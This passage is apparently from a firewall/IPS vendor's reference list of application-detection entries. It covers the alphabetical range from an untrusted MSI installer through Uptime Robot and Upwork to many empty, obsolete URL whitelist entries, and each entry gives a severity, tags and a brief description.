First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Description: Untrusted Windows installer (msi) has been detected. MSI installers are commonly used to deploy software on Windows. Commonly this type of installer does not need network connectivity to do it's job but it may call home for telemetry purposes. Allowing this application may allow any program with the right binary name and product name to pass through the NGFW.
Back to top

Untrusted-Generic-TLS

About this situation: Untrusted TLS Application traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1629-5242
Description: This application is matched when the connection uses TLS, but there was an error in the TLS Handshake. More specifically, either the server rejected the SNI provided by the client, there was a mismatch between the SNI and the server certificate, or the server used a self-signed certificate. Based on the TLS handshake, the tunneled connection does not contain HTTP inside. Such connections are usually initiated by a client application other than a web browser.
Back to top

Untrusted-Web-TLS

About this situation: Untrusted Web Application traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1629-5242
Description: This application is matched when the connection uses HTTPS, but there was an error in the TLS Handshake. More specifically, either the server rejected the SNI provided by the client, there was a mismatch between the SNI and the server certificate, or the server used a self-signed certificate.
Back to top

Unum.com

About this situation: Application Unum.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unum products and services meet the needs of a diverse workforce that includes four generations, growing ethnic diversity and changing family dynamics.
Back to top

UOL

About this situation: UOL usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-630-5211
Description: UOL (Universo Online) is a Brazilian online service provider and internet service provider. It is the leader in Latin America and the homepage portal is the biggest in the Portuguese-speaking world. Source: Wikipedia
Back to top

UPC-Business

About this situation: Application UPC-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: e-fon provides telephony solutions based on VoIP / IP technology.
Back to top

Update Session Orchestrator

About this situation: Endpoint Context Agent based Update Session Orchestrator detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1215-5242
Description: A network connection launched by Update Session Orchestrator was detected. Update Session Orchestrator is used for downloading updates on Windows 10.
Back to top

UpdateStar

About this situation: Application UpdateStar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UpdateStar is the provider of software information and software services for computer users.
Back to top

UpGuard

About this situation: Application UpGuard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Upguard provides a cloud-based configuration management platform that activates DevOps by helping IT enterprises focus on shipping features, not fixing configurations.
Back to top

Upland-Software

About this situation: Application Upland-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Upland Software is a provider of cloud-based Enterprise Work Management software. Our family of applications enables users to manage their projects, professional workforce and IT investments, automate document-intensive business processes and effectively engage with their customers, prospects and community via the web and mobile technologies.
Back to top

Uplay

About this situation: Endpoint Context Agent based Uplay
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Ubisoft Uplay endpoint application has been detected.
Back to top

Uploaded

About this situation: Uploaded usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-622-5211
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Uploading

About this situation: Uploading usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to upload and download files over the web, with a fee for larger files.
Back to top

UPnP

About this situation: Universal Plug and Play (UPnP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Universal Plug and Play usage. UPnP is a set of computer network protocols that allow computers and devices to publish, discover, and configure network service automatically.
Back to top

UpSellit

About this situation: Application UpSellit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UpSellit- is a service solution provider that builds custom technologies to target specific reasons for site abandonment.
Back to top

Upserve

About this situation: Application Upserve detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Upserve is the smart management assistant serving up guidance for restaurants. It makes to manage guests, staff, marketing, finances, and the menu.
Back to top

Upsight

About this situation: Application Upsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Upsite provides a full suite of solutions designed to optimize data center cooling systems, allowing managers to maximize cooling capacity while reducing energy costs.
Back to top

Uptime-Robot

About this situation: Application Uptime-Robot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Uptime Robot is an uptime monitoring service that helps users to get acknowledged of the downtimes of their websites (servers) and also track the performance of them.
Back to top

Uptobox

About this situation: Application Uptobox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Uptobox is a file hosting service.
Back to top

UptoLike

About this situation: Application UptoLike detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UpToLike is a free resource for the organization of social activity. Purpose for use this service - getting traffic from social networks, and further study of the behavior of visitors to a particular website.
Back to top

Uptrends

About this situation: Application Uptrends detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Uptrends helps to maximize your uptime and optimize for performance with 24
Back to top

Upwork

About this situation: Application Upwork detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Upwork is a global freelancing platform where businesses and independent professionals connect and collaborate remotely.
Back to top

Urban-Airship

About this situation: Urban Airship usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Urban Airship is an on-line advertising service.
Back to top

Urban-Dictionary

About this situation: Urban Dictionary usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Urban Dictionary is an online dictionary for slang words and phrases.
Back to top

URL Stop Condition

About this situation: URL Stop Condition
Context: Local Correlation
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1678-5242
Description: URL Stop Condition for use with URL List and Category Applications.
Back to top

URL Stop Condition With Decryption

About this situation: URL Stop Condition with Decryption
Context: Local Correlation
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Description: A Stop Condition to be used when Decryption may be needed to identify HTTPS traffic correctly.
Back to top

URLList 2818050

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818051

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818052

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818053

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818054

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818055

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818056

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818057

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818058

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818059

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818060

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2818061

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-822-5242
Description:
Back to top

URLList 2850004

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850007

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850021

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850024

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850026

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850030

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850033

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850035

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850039

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850047

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850048

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850049

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850051

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850059

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850060

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850061

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850063

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850068

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850069

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850071

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850076

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850078

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850081

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850083

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850085

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850087

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850094

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850102

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850107

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850145

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850148

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850159

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850169

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850181

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850182

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850188

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850191

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850195

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850199

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850214

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850228

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850235

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850255

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850256

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850269

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850274

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850281

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850290

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850293

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850295

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850297

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850351

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850362

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850380

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850387

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850391

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850393

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850399

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850400

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850402

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850405

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850407

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850421

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850424

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850426

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850427

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850446

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850454

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850458

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850471

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850486

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850488

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850491

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850493

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850496

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850497

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850498

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850503

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850504

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850506

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850508

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850510

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850511

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850513

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850514

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850525

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850529

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850536

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850544

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850549

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850551

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850552

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850556

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850558

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850560

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850561

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850564

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850568

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850569

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850574

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850575

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850576

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850579

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850587

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850596

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850597

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850598

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850599

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850608

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850609

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

URLList 2850611

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1041-5242
